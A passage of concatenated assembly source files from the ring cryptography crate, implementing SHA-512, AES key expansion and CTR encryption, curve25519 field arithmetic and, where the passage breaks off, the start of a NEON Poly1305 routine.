add v1.2d,v1.2d,v25.2d // "T1 + H + K512[i]"
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
rev64 v17.16b,v17.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
ld1 {v25.2d},[x3],#16
add v24.2d,v24.2d,v18.2d
ld1 {v18.16b},[x1],#16 // load next input
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v24.2d // "T1 + H + K512[i]"
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
rev64 v18.16b,v18.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
ld1 {v24.2d},[x3],#16
add v25.2d,v25.2d,v19.2d
ld1 {v19.16b},[x1],#16 // load next input
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v2.16b,v3.16b,#8
ext v6.16b,v1.16b,v2.16b,#8
add v3.2d,v3.2d,v25.2d // "T1 + H + K512[i]"
.long 0xce6680a3 //sha512h v3.16b,v5.16b,v6.16b
rev64 v19.16b,v19.16b
add v4.2d,v1.2d,v3.2d // "D + T1"
.long 0xce608423 //sha512h2 v3.16b,v1.16b,v0.16b
ld1 {v25.2d},[x3],#16
add v24.2d,v24.2d,v20.2d
ld1 {v20.16b},[x1],#16 // load next input
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v4.16b,v2.16b,#8
ext v6.16b,v0.16b,v4.16b,#8
add v2.2d,v2.2d,v24.2d // "T1 + H + K512[i]"
.long 0xce6680a2 //sha512h v2.16b,v5.16b,v6.16b
rev64 v20.16b,v20.16b
add v1.2d,v0.2d,v2.2d // "D + T1"
.long 0xce638402 //sha512h2 v2.16b,v0.16b,v3.16b
ld1 {v24.2d},[x3],#16
add v25.2d,v25.2d,v21.2d
ld1 {v21.16b},[x1],#16 // load next input
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v1.16b,v4.16b,#8
ext v6.16b,v3.16b,v1.16b,#8
add v4.2d,v4.2d,v25.2d // "T1 + H + K512[i]"
.long 0xce6680a4 //sha512h v4.16b,v5.16b,v6.16b
rev64 v21.16b,v21.16b
add v0.2d,v3.2d,v4.2d // "D + T1"
.long 0xce628464 //sha512h2 v4.16b,v3.16b,v2.16b
ld1 {v25.2d},[x3],#16
add v24.2d,v24.2d,v22.2d
ld1 {v22.16b},[x1],#16 // load next input
ext v24.16b,v24.16b,v24.16b,#8
ext v5.16b,v0.16b,v1.16b,#8
ext v6.16b,v2.16b,v0.16b,#8
add v1.2d,v1.2d,v24.2d // "T1 + H + K512[i]"
.long 0xce6680a1 //sha512h v1.16b,v5.16b,v6.16b
rev64 v22.16b,v22.16b
add v3.2d,v2.2d,v1.2d // "D + T1"
.long 0xce648441 //sha512h2 v1.16b,v2.16b,v4.16b
sub x3,x3,#80*8 // rewind
add v25.2d,v25.2d,v23.2d
ld1 {v23.16b},[x1],#16 // load next input
ext v25.16b,v25.16b,v25.16b,#8
ext v5.16b,v3.16b,v0.16b,#8
ext v6.16b,v4.16b,v3.16b,#8
add v0.2d,v0.2d,v25.2d // "T1 + H + K512[i]"
.long 0xce6680a0 //sha512h v0.16b,v5.16b,v6.16b
rev64 v23.16b,v23.16b
add v2.2d,v4.2d,v0.2d // "D + T1"
.long 0xce618480 //sha512h2 v0.16b,v4.16b,v1.16b
add v0.2d,v0.2d,v26.2d // accumulate
add v1.2d,v1.2d,v27.2d
add v2.2d,v2.2d,v28.2d
add v3.2d,v3.2d,v29.2d
cbnz x2,Loop_hw
st1 {v0.2d,v1.2d,v2.2d,v3.2d},[x0] // store context
ldr x29,[sp],#16
ret
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(__APPLE__)
|
mi2bjss/Pressel-site | 7,660 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/pregenerated/aesv8-armx-win64.S | // This file is generated from a similarly-named Perl script in the BoringSSL
// source tree. Do not edit by hand.
#include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_AARCH64) && defined(_WIN32)
#if __ARM_MAX_ARCH__>=7
.text
.arch armv8-a+crypto
.section .rodata
.align 5
Lrcon:
.long 0x01,0x01,0x01,0x01
.long 0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d,0x0c0f0e0d // rotate-n-splat
.long 0x1b,0x1b,0x1b,0x1b
.text
.globl aes_hw_set_encrypt_key
.def aes_hw_set_encrypt_key
.type 32
.endef
.align 5
aes_hw_set_encrypt_key:
Lenc_key:
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
mov x3,#-2
cmp w1,#128
b.lt Lenc_key_abort
cmp w1,#256
b.gt Lenc_key_abort
tst w1,#0x3f
b.ne Lenc_key_abort
adrp x3,Lrcon
add x3,x3,:lo12:Lrcon
cmp w1,#192
eor v0.16b,v0.16b,v0.16b
ld1 {v3.16b},[x0],#16
mov w1,#8 // reuse w1
ld1 {v1.4s,v2.4s},[x3],#32
b.lt Loop128
// 192-bit key support was removed.
b L256
.align 4
Loop128:
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
subs w1,w1,#1
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
b.ne Loop128
ld1 {v1.4s},[x3]
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
tbl v6.16b,{v3.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v3.4s},[x2],#16
aese v6.16b,v0.16b
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
eor v3.16b,v3.16b,v6.16b
st1 {v3.4s},[x2]
add x2,x2,#0x50
mov w12,#10
b Ldone
// 192-bit key support was removed.
.align 4
L256:
ld1 {v4.16b},[x0]
mov w1,#7
mov w12,#14
st1 {v3.4s},[x2],#16
Loop256:
tbl v6.16b,{v4.16b},v2.16b
ext v5.16b,v0.16b,v3.16b,#12
st1 {v4.4s},[x2],#16
aese v6.16b,v0.16b
subs w1,w1,#1
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v3.16b,v3.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v6.16b,v6.16b,v1.16b
eor v3.16b,v3.16b,v5.16b
shl v1.16b,v1.16b,#1
eor v3.16b,v3.16b,v6.16b
st1 {v3.4s},[x2],#16
b.eq Ldone
dup v6.4s,v3.s[3] // just splat
ext v5.16b,v0.16b,v4.16b,#12
aese v6.16b,v0.16b
eor v4.16b,v4.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v4.16b,v4.16b,v5.16b
ext v5.16b,v0.16b,v5.16b,#12
eor v4.16b,v4.16b,v5.16b
eor v4.16b,v4.16b,v6.16b
b Loop256
Ldone:
str w12,[x2]
mov x3,#0
Lenc_key_abort:
mov x0,x3 // return value
ldr x29,[sp],#16
ret
.globl aes_hw_ctr32_encrypt_blocks
.def aes_hw_ctr32_encrypt_blocks
.type 32
.endef
.align 5
aes_hw_ctr32_encrypt_blocks:
// Armv8.3-A PAuth: even though x30 is pushed to stack it is not popped later.
AARCH64_VALID_CALL_TARGET
stp x29,x30,[sp,#-16]!
add x29,sp,#0
ldr w5,[x3,#240]
ldr w8, [x4, #12]
ld1 {v0.4s},[x4]
ld1 {v16.4s,v17.4s},[x3] // load key schedule...
sub w5,w5,#4
mov x12,#16
cmp x2,#2
add x7,x3,x5,lsl#4 // pointer to last 5 round keys
sub w5,w5,#2
ld1 {v20.4s,v21.4s},[x7],#32
ld1 {v22.4s,v23.4s},[x7],#32
ld1 {v7.4s},[x7]
add x7,x3,#32
mov w6,w5
csel x12,xzr,x12,lo
// ARM Cortex-A57 and Cortex-A72 cores running in 32-bit mode are
// affected by silicon errata #1742098 [0] and #1655431 [1],
// respectively, where the second instruction of an aese/aesmc
// instruction pair may execute twice if an interrupt is taken right
// after the first instruction consumes an input register of which a
// single 32-bit lane has been updated the last time it was modified.
//
// This function uses a counter in one 32-bit lane. The vmov lines
// could write to v1.16b and v18.16b directly, but that trips this bugs.
// We write to v6.16b and copy to the final register as a workaround.
//
// [0] ARM-EPM-049219 v23 Cortex-A57 MPCore Software Developers Errata Notice
// [1] ARM-EPM-012079 v11.0 Cortex-A72 MPCore Software Developers Errata Notice
#ifndef __AARCH64EB__
rev w8, w8
#endif
add w10, w8, #1
orr v6.16b,v0.16b,v0.16b
rev w10, w10
mov v6.s[3],w10
add w8, w8, #2
orr v1.16b,v6.16b,v6.16b
b.ls Lctr32_tail
rev w12, w8
mov v6.s[3],w12
sub x2,x2,#3 // bias
orr v18.16b,v6.16b,v6.16b
b Loop3x_ctr32
.align 4
Loop3x_ctr32:
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
aese v18.16b,v16.16b
aesmc v18.16b,v18.16b
ld1 {v16.4s},[x7],#16
subs w6,w6,#2
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
aese v18.16b,v17.16b
aesmc v18.16b,v18.16b
ld1 {v17.4s},[x7],#16
b.gt Loop3x_ctr32
aese v0.16b,v16.16b
aesmc v4.16b,v0.16b
aese v1.16b,v16.16b
aesmc v5.16b,v1.16b
ld1 {v2.16b},[x0],#16
add w9,w8,#1
aese v18.16b,v16.16b
aesmc v18.16b,v18.16b
ld1 {v3.16b},[x0],#16
rev w9,w9
aese v4.16b,v17.16b
aesmc v4.16b,v4.16b
aese v5.16b,v17.16b
aesmc v5.16b,v5.16b
ld1 {v19.16b},[x0],#16
mov x7,x3
aese v18.16b,v17.16b
aesmc v17.16b,v18.16b
aese v4.16b,v20.16b
aesmc v4.16b,v4.16b
aese v5.16b,v20.16b
aesmc v5.16b,v5.16b
eor v2.16b,v2.16b,v7.16b
add w10,w8,#2
aese v17.16b,v20.16b
aesmc v17.16b,v17.16b
eor v3.16b,v3.16b,v7.16b
add w8,w8,#3
aese v4.16b,v21.16b
aesmc v4.16b,v4.16b
aese v5.16b,v21.16b
aesmc v5.16b,v5.16b
// Note the logic to update v0.16b, v1.16b, and v1.16b is written to work
// around a bug in ARM Cortex-A57 and Cortex-A72 cores running in
// 32-bit mode. See the comment above.
eor v19.16b,v19.16b,v7.16b
mov v6.s[3], w9
aese v17.16b,v21.16b
aesmc v17.16b,v17.16b
orr v0.16b,v6.16b,v6.16b
rev w10,w10
aese v4.16b,v22.16b
aesmc v4.16b,v4.16b
mov v6.s[3], w10
rev w12,w8
aese v5.16b,v22.16b
aesmc v5.16b,v5.16b
orr v1.16b,v6.16b,v6.16b
mov v6.s[3], w12
aese v17.16b,v22.16b
aesmc v17.16b,v17.16b
orr v18.16b,v6.16b,v6.16b
subs x2,x2,#3
aese v4.16b,v23.16b
aese v5.16b,v23.16b
aese v17.16b,v23.16b
eor v2.16b,v2.16b,v4.16b
ld1 {v16.4s},[x7],#16 // re-pre-load rndkey[0]
st1 {v2.16b},[x1],#16
eor v3.16b,v3.16b,v5.16b
mov w6,w5
st1 {v3.16b},[x1],#16
eor v19.16b,v19.16b,v17.16b
ld1 {v17.4s},[x7],#16 // re-pre-load rndkey[1]
st1 {v19.16b},[x1],#16
b.hs Loop3x_ctr32
adds x2,x2,#3
b.eq Lctr32_done
cmp x2,#1
mov x12,#16
csel x12,xzr,x12,eq
Lctr32_tail:
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
ld1 {v16.4s},[x7],#16
subs w6,w6,#2
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
ld1 {v17.4s},[x7],#16
b.gt Lctr32_tail
aese v0.16b,v16.16b
aesmc v0.16b,v0.16b
aese v1.16b,v16.16b
aesmc v1.16b,v1.16b
aese v0.16b,v17.16b
aesmc v0.16b,v0.16b
aese v1.16b,v17.16b
aesmc v1.16b,v1.16b
ld1 {v2.16b},[x0],x12
aese v0.16b,v20.16b
aesmc v0.16b,v0.16b
aese v1.16b,v20.16b
aesmc v1.16b,v1.16b
ld1 {v3.16b},[x0]
aese v0.16b,v21.16b
aesmc v0.16b,v0.16b
aese v1.16b,v21.16b
aesmc v1.16b,v1.16b
eor v2.16b,v2.16b,v7.16b
aese v0.16b,v22.16b
aesmc v0.16b,v0.16b
aese v1.16b,v22.16b
aesmc v1.16b,v1.16b
eor v3.16b,v3.16b,v7.16b
aese v0.16b,v23.16b
aese v1.16b,v23.16b
cmp x2,#1
eor v2.16b,v2.16b,v0.16b
eor v3.16b,v3.16b,v1.16b
st1 {v2.16b},[x1],#16
b.eq Lctr32_done
st1 {v3.16b},[x1]
Lctr32_done:
ldr x29,[sp],#16
ret
#endif
#endif // !OPENSSL_NO_ASM && defined(OPENSSL_AARCH64) && defined(_WIN32)
|
mi2bjss/Pressel-site | 2,659 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/third_party/fiat/asm/fiat_curve25519_adx_square.S | #include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86_64) && \
(defined(__APPLE__) || defined(__ELF__))
.intel_syntax noprefix
.text
#if defined(__APPLE__)
.private_extern _fiat_curve25519_adx_square
.global _fiat_curve25519_adx_square
_fiat_curve25519_adx_square:
#else
.type fiat_curve25519_adx_square, @function
.hidden fiat_curve25519_adx_square
.global fiat_curve25519_adx_square
fiat_curve25519_adx_square:
#endif
.cfi_startproc
_CET_ENDBR
push rbp
.cfi_adjust_cfa_offset 8
.cfi_offset rbp, -16
mov rbp, rsp
mov rdx, [ rsi + 0x0 ]
mulx r10, rax, [ rsi + 0x8 ]
mov rdx, [ rsi + 0x0 ]
mulx rcx, r11, [ rsi + 0x10 ]
xor rdx, rdx
adox r11, r10
mov rdx, [ rsi + 0x0 ]
mulx r9, r8, [ rsi + 0x18 ]
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x80 ], rbx
.cfi_offset rbx, -16-0x80
mulx rbx, r10, [ rsi + 0x18 ]
adox r8, rcx
mov [rsp - 0x48 ], rdi
adox r10, r9
adcx rax, rax
mov rdx, [ rsi + 0x10 ]
mulx r9, rcx, [ rsi + 0x18 ]
adox rcx, rbx
mov rdx, [ rsi + 0x10 ]
mulx rdi, rbx, [ rsi + 0x8 ]
mov rdx, 0x0
adox r9, rdx
mov [ rsp - 0x70 ], r12
.cfi_offset r12, -16-0x70
mov r12, -0x3
inc r12
adox rbx, r8
adox rdi, r10
adcx r11, r11
mov r8, rdx
adox r8, rcx
mov r10, rdx
adox r10, r9
adcx rbx, rbx
mov rdx, [ rsi + 0x0 ]
mulx r9, rcx, rdx
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x68 ], r13
.cfi_offset r13, -16-0x68
mov [ rsp - 0x60 ], r14
.cfi_offset r14, -16-0x60
mulx r14, r13, rdx
seto dl
inc r12
adox r9, rax
adox r13, r11
adox r14, rbx
adcx rdi, rdi
mov al, dl
mov rdx, [ rsi + 0x10 ]
mulx rbx, r11, rdx
adox r11, rdi
adcx r8, r8
adox rbx, r8
adcx r10, r10
movzx rdx, al
mov rdi, 0x0
adcx rdx, rdi
movzx r8, al
lea r8, [ r8 + rdx ]
mov rdx, [ rsi + 0x18 ]
mulx rdi, rax, rdx
adox rax, r10
mov rdx, 0x26
mov [ rsp - 0x58 ], r15
.cfi_offset r15, -16-0x58
mulx r15, r10, r11
clc
adcx r10, rcx
mulx r11, rcx, rbx
adox r8, rdi
mulx rdi, rbx, r8
inc r12
adox rcx, r9
mulx r8, r9, rax
adcx r15, rcx
adox r9, r13
adcx r11, r9
adox rbx, r14
adox rdi, r12
adcx r8, rbx
adc rdi, 0x0
mulx r14, r13, rdi
test al, al
mov rdi, [ rsp - 0x48 ]
adox r13, r10
mov r14, r12
adox r14, r15
mov [ rdi + 0x8 ], r14
mov rax, r12
adox rax, r11
mov r10, r12
adox r10, r8
mov [ rdi + 0x10 ], rax
mov rcx, r12
cmovo rcx, rdx
adcx r13, rcx
mov [ rdi + 0x0 ], r13
mov [ rdi + 0x18 ], r10
mov rbx, [ rsp - 0x80 ]
.cfi_restore rbx
mov r12, [ rsp - 0x70 ]
.cfi_restore r12
mov r13, [ rsp - 0x68 ]
.cfi_restore r13
mov r14, [ rsp - 0x60 ]
.cfi_restore r14
mov r15, [ rsp - 0x58 ]
.cfi_restore r15
pop rbp
.cfi_restore rbp
.cfi_adjust_cfa_offset -8
ret
.cfi_endproc
#if defined(__ELF__)
.size fiat_curve25519_adx_square, .-fiat_curve25519_adx_square
#endif
#endif
|
mi2bjss/Pressel-site | 3,464 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/third_party/fiat/asm/fiat_curve25519_adx_mul.S | #include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_X86_64) && \
(defined(__APPLE__) || defined(__ELF__))
.intel_syntax noprefix
.text
#if defined(__APPLE__)
.private_extern _fiat_curve25519_adx_mul
.global _fiat_curve25519_adx_mul
_fiat_curve25519_adx_mul:
#else
.type fiat_curve25519_adx_mul, @function
.hidden fiat_curve25519_adx_mul
.global fiat_curve25519_adx_mul
fiat_curve25519_adx_mul:
#endif
.cfi_startproc
_CET_ENDBR
push rbp
.cfi_adjust_cfa_offset 8
.cfi_offset rbp, -16
mov rbp, rsp
mov rax, rdx
mov rdx, [ rsi + 0x18 ]
mulx r11, r10, [ rax + 0x8 ]
mov rdx, [ rax + 0x0 ]
mov [ rsp - 0x58 ], r15
.cfi_offset r15, -16-0x58
mulx r8, rcx, [ rsi + 0x18 ]
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x80 ], rbx
.cfi_offset rbx, -16-0x80
mulx rbx, r9, [ rax + 0x18 ]
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x70 ], r12
.cfi_offset r12, -16-0x70
mulx r15, r12, [ rax + 0x8 ]
mov rdx, [ rsi + 0x0 ]
mov [ rsp - 0x68 ], r13
.cfi_offset r13, -16-0x68
mov [ rsp - 0x60 ], r14
.cfi_offset r14, -16-0x60
mulx r14, r13, [ rax + 0x0 ]
mov rdx, [ rax + 0x10 ]
mov [ rsp - 0x18 ], r15
mov [ rsp - 0x50 ], rdi
mulx rdi, r15, [ rsi + 0x0 ]
mov rdx, [ rax + 0x18 ]
mov [ rsp - 0x48 ], r13
mov [ rsp - 0x40 ], r9
mulx r9, r13, [ rsi + 0x0 ]
test al, al
adox rcx, rdi
mov rdx, [ rsi + 0x10 ]
mov [ rsp - 0x38 ], r13
mulx r13, rdi, [ rax + 0x8 ]
adox r10, r9
mov rdx, 0x0
adox rbx, rdx
adcx rdi, rcx
adcx r8, r10
mov r9, rdx
adcx r9, rbx
mov rdx, [ rsi + 0x10 ]
mulx r10, rcx, [ rax + 0x0 ]
mov rdx, [ rsi + 0x0 ]
mov [ rsp - 0x30 ], r15
mulx r15, rbx, [ rax + 0x8 ]
mov rdx, -0x2
inc rdx
adox rcx, r15
setc r15b
clc
adcx rcx, r12
adox r10, rdi
mov rdx, [ rax + 0x10 ]
mov [ rsp - 0x78 ], rcx
mulx rcx, rdi, [ rsi + 0x10 ]
adox rdi, r8
mov rdx, [ rax + 0x18 ]
mov [ rsp - 0x28 ], rcx
mulx rcx, r8, [ rsi + 0x10 ]
mov rdx, [ rax + 0x10 ]
mov [ rsp - 0x20 ], r8
mulx r12, r8, [ rsi + 0x18 ]
adox r8, r9
mov rdx, [ rsi + 0x8 ]
mov [ rsp - 0x10 ], r12
mulx r12, r9, [ rax + 0x10 ]
movzx rdx, r15b
lea rdx, [ rdx + rcx ]
adcx r9, r10
adcx r13, rdi
mov r15, 0x0
mov r10, r15
adox r10, rdx
mov rdx, [ rax + 0x18 ]
mulx rcx, rdi, [ rsi + 0x18 ]
adox rcx, r15
adcx r11, r8
mov rdx, r15
adcx rdx, r10
adcx rcx, r15
mov r8, rdx
mov rdx, [ rax + 0x0 ]
mulx r15, r10, [ rsi + 0x8 ]
test al, al
adox r10, r14
adcx rbx, r10
adox r15, [ rsp - 0x78 ]
adcx r15, [ rsp - 0x30 ]
adox r9, [ rsp - 0x18 ]
adcx r9, [ rsp - 0x38 ]
adox r13, [ rsp - 0x40 ]
adcx r12, r13
adox r11, [ rsp - 0x20 ]
adcx r11, [ rsp - 0x28 ]
mov rdx, 0x26
mulx rsi, r14, r12
adox rdi, r8
adcx rdi, [ rsp - 0x10 ]
mulx r10, r8, r11
mov r13, 0x0
adox rcx, r13
adcx rcx, r13
mulx r11, r12, rdi
xor rdi, rdi
adox r8, rbx
adox r12, r15
mulx rbx, r13, rcx
adcx r14, [ rsp - 0x48 ]
adox r13, r9
adox rbx, rdi
adcx rsi, r8
adcx r10, r12
adcx r11, r13
adc rbx, 0x0
mulx r9, r15, rbx
xor r9, r9
adox r15, r14
mov rdi, r9
adox rdi, rsi
mov rcx, r9
adox rcx, r10
mov r8, [ rsp - 0x50 ]
mov [ r8 + 0x8 ], rdi
mov r12, r9
adox r12, r11
mov r14, r9
cmovo r14, rdx
mov [ r8 + 0x18 ], r12
adcx r15, r14
mov [ r8 + 0x0 ], r15
mov [ r8 + 0x10 ], rcx
mov rbx, [ rsp - 0x80 ]
.cfi_restore rbx
mov r12, [ rsp - 0x70 ]
.cfi_restore r12
mov r13, [ rsp - 0x68 ]
.cfi_restore r13
mov r14, [ rsp - 0x60 ]
.cfi_restore r14
mov r15, [ rsp - 0x58 ]
.cfi_restore r15
pop rbp
.cfi_restore rbp
.cfi_adjust_cfa_offset -8
ret
.cfi_endproc
#if defined(__ELF__)
.size fiat_curve25519_adx_mul, .-fiat_curve25519_adx_mul
#endif
#endif
|
mi2bjss/Pressel-site | 62,534 | .cargo/registry/src/index.crates.io-6f17d22bba15001f/ring-0.17.13/crypto/poly1305/poly1305_arm_asm.S | #include <ring-core/asm_base.h>
#if !defined(OPENSSL_NO_ASM) && defined(OPENSSL_ARM) && defined(__ELF__)
#pragma GCC diagnostic ignored "-Wlanguage-extension-token"
# This implementation was taken from the public domain, neon2 version in
# SUPERCOP by D. J. Bernstein and Peter Schwabe.
# qhasm: int32 input_0
# qhasm: int32 input_1
# qhasm: int32 input_2
# qhasm: int32 input_3
# qhasm: stack32 input_4
# qhasm: stack32 input_5
# qhasm: stack32 input_6
# qhasm: stack32 input_7
# qhasm: int32 caller_r4
# qhasm: int32 caller_r5
# qhasm: int32 caller_r6
# qhasm: int32 caller_r7
# qhasm: int32 caller_r8
# qhasm: int32 caller_r9
# qhasm: int32 caller_r10
# qhasm: int32 caller_r11
# qhasm: int32 caller_r12
# qhasm: int32 caller_r14
# qhasm: reg128 caller_q4
# qhasm: reg128 caller_q5
# qhasm: reg128 caller_q6
# qhasm: reg128 caller_q7
# qhasm: startcode
.fpu neon
.text
# qhasm: reg128 r0
# qhasm: reg128 r1
# qhasm: reg128 r2
# qhasm: reg128 r3
# qhasm: reg128 r4
# qhasm: reg128 x01
# qhasm: reg128 x23
# qhasm: reg128 x4
# qhasm: reg128 y0
# qhasm: reg128 y12
# qhasm: reg128 y34
# qhasm: reg128 5y12
# qhasm: reg128 5y34
# qhasm: stack128 y0_stack
# qhasm: stack128 y12_stack
# qhasm: stack128 y34_stack
# qhasm: stack128 5y12_stack
# qhasm: stack128 5y34_stack
# qhasm: reg128 z0
# qhasm: reg128 z12
# qhasm: reg128 z34
# qhasm: reg128 5z12
# qhasm: reg128 5z34
# qhasm: stack128 z0_stack
# qhasm: stack128 z12_stack
# qhasm: stack128 z34_stack
# qhasm: stack128 5z12_stack
# qhasm: stack128 5z34_stack
# qhasm: stack128 two24
# qhasm: int32 ptr
# qhasm: reg128 c01
# qhasm: reg128 c23
# qhasm: reg128 d01
# qhasm: reg128 d23
# qhasm: reg128 t0
# qhasm: reg128 t1
# qhasm: reg128 t2
# qhasm: reg128 t3
# qhasm: reg128 t4
# qhasm: reg128 mask
# qhasm: reg128 u0
# qhasm: reg128 u1
# qhasm: reg128 u2
# qhasm: reg128 u3
# qhasm: reg128 u4
# qhasm: reg128 v01
# qhasm: reg128 mid
# qhasm: reg128 v23
# qhasm: reg128 v4
# qhasm: int32 len
# qhasm: qpushenter crypto_onetimeauth_poly1305_neon2_blocks
.align 4
.global openssl_poly1305_neon2_blocks
.hidden openssl_poly1305_neon2_blocks
.type openssl_poly1305_neon2_blocks STT_FUNC
openssl_poly1305_neon2_blocks:
vpush {q4,q5,q6,q7}
mov r12,sp
sub sp,sp,#192
bic sp,sp,#31
# qhasm: len = input_3
# asm 1: mov >len=int32#4,<input_3=int32#4
# asm 2: mov >len=r3,<input_3=r3
mov r3,r3
# qhasm: new y0
# qhasm: y0 = mem64[input_1]y0[1]; input_1 += 8
# asm 1: vld1.8 {<y0=reg128#1%bot},[<input_1=int32#2]!
# asm 2: vld1.8 {<y0=d0},[<input_1=r1]!
vld1.8 {d0},[r1]!
# qhasm: y12 = mem128[input_1]; input_1 += 16
# asm 1: vld1.8 {>y12=reg128#2%bot->y12=reg128#2%top},[<input_1=int32#2]!
# asm 2: vld1.8 {>y12=d2->y12=d3},[<input_1=r1]!
vld1.8 {d2-d3},[r1]!
# qhasm: y34 = mem128[input_1]; input_1 += 16
# asm 1: vld1.8 {>y34=reg128#3%bot->y34=reg128#3%top},[<input_1=int32#2]!
# asm 2: vld1.8 {>y34=d4->y34=d5},[<input_1=r1]!
vld1.8 {d4-d5},[r1]!
# qhasm: input_1 += 8
# asm 1: add >input_1=int32#2,<input_1=int32#2,#8
# asm 2: add >input_1=r1,<input_1=r1,#8
add r1,r1,#8
# qhasm: new z0
# qhasm: z0 = mem64[input_1]z0[1]; input_1 += 8
# asm 1: vld1.8 {<z0=reg128#4%bot},[<input_1=int32#2]!
# asm 2: vld1.8 {<z0=d6},[<input_1=r1]!
vld1.8 {d6},[r1]!
# qhasm: z12 = mem128[input_1]; input_1 += 16
# asm 1: vld1.8 {>z12=reg128#5%bot->z12=reg128#5%top},[<input_1=int32#2]!
# asm 2: vld1.8 {>z12=d8->z12=d9},[<input_1=r1]!
vld1.8 {d8-d9},[r1]!
# qhasm: z34 = mem128[input_1]; input_1 += 16
# asm 1: vld1.8 {>z34=reg128#6%bot->z34=reg128#6%top},[<input_1=int32#2]!
# asm 2: vld1.8 {>z34=d10->z34=d11},[<input_1=r1]!
vld1.8 {d10-d11},[r1]!
# qhasm: 2x mask = 0xffffffff
# asm 1: vmov.i64 >mask=reg128#7,#0xffffffff
# asm 2: vmov.i64 >mask=q6,#0xffffffff
vmov.i64 q6,#0xffffffff
# qhasm: 2x u4 = 0xff
# asm 1: vmov.i64 >u4=reg128#8,#0xff
# asm 2: vmov.i64 >u4=q7,#0xff
vmov.i64 q7,#0xff
# qhasm: x01 aligned= mem128[input_0];input_0+=16
# asm 1: vld1.8 {>x01=reg128#9%bot->x01=reg128#9%top},[<input_0=int32#1,: 128]!
# asm 2: vld1.8 {>x01=d16->x01=d17},[<input_0=r0,: 128]!
vld1.8 {d16-d17},[r0,: 128]!
# qhasm: x23 aligned= mem128[input_0];input_0+=16
# asm 1: vld1.8 {>x23=reg128#10%bot->x23=reg128#10%top},[<input_0=int32#1,: 128]!
# asm 2: vld1.8 {>x23=d18->x23=d19},[<input_0=r0,: 128]!
vld1.8 {d18-d19},[r0,: 128]!
# qhasm: x4 aligned= mem64[input_0]x4[1]
# asm 1: vld1.8 {<x4=reg128#11%bot},[<input_0=int32#1,: 64]
# asm 2: vld1.8 {<x4=d20},[<input_0=r0,: 64]
vld1.8 {d20},[r0,: 64]
# qhasm: input_0 -= 32
# asm 1: sub >input_0=int32#1,<input_0=int32#1,#32
# asm 2: sub >input_0=r0,<input_0=r0,#32
sub r0,r0,#32
# qhasm: 2x mask unsigned>>=6
# asm 1: vshr.u64 >mask=reg128#7,<mask=reg128#7,#6
# asm 2: vshr.u64 >mask=q6,<mask=q6,#6
vshr.u64 q6,q6,#6
# qhasm: 2x u4 unsigned>>= 7
# asm 1: vshr.u64 >u4=reg128#8,<u4=reg128#8,#7
# asm 2: vshr.u64 >u4=q7,<u4=q7,#7
vshr.u64 q7,q7,#7
# qhasm: 4x 5y12 = y12 << 2
# asm 1: vshl.i32 >5y12=reg128#12,<y12=reg128#2,#2
# asm 2: vshl.i32 >5y12=q11,<y12=q1,#2
vshl.i32 q11,q1,#2
# qhasm: 4x 5y34 = y34 << 2
# asm 1: vshl.i32 >5y34=reg128#13,<y34=reg128#3,#2
